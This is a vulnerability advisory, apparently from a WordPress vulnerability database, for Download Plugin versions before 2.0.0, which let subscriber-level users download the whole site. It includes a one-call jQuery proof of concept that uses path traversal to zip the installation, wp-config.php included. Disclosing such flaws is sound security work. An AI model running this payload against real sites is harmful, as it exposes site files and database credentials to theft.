WordPress Plugin Vulnerabilities
Download Plugin < 2.0.0 - Subscriber+ Website Download
Description
The plugins does not properly validate a user has the required privileges to access a backup's nonce identifier, which may allow any users with an account on the site (such as subscriber) to download a full copy of the website.
Proof of Concept
PoC:
jQuery.post(ajaxurl,{
action:"dpwap_plugin_download_url",
pluginData:"..\\..\\..\\wordpress"
})
Warning: this will make a zip of the whole installation and takes a few minutes.
The result is available at https://example.com/wordpress.zip and the zip file contains all files under the installation directory including wp-config.php. Affects Plugins
Fixed in version 2.0.0
References
Classification
Miscellaneous
Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
Timeline
Publicly Published
2021-11-11 (about 1 years ago)
Added
2022-11-02 (about 4 months ago)
Last Updated
2022-11-02 (about 4 months ago)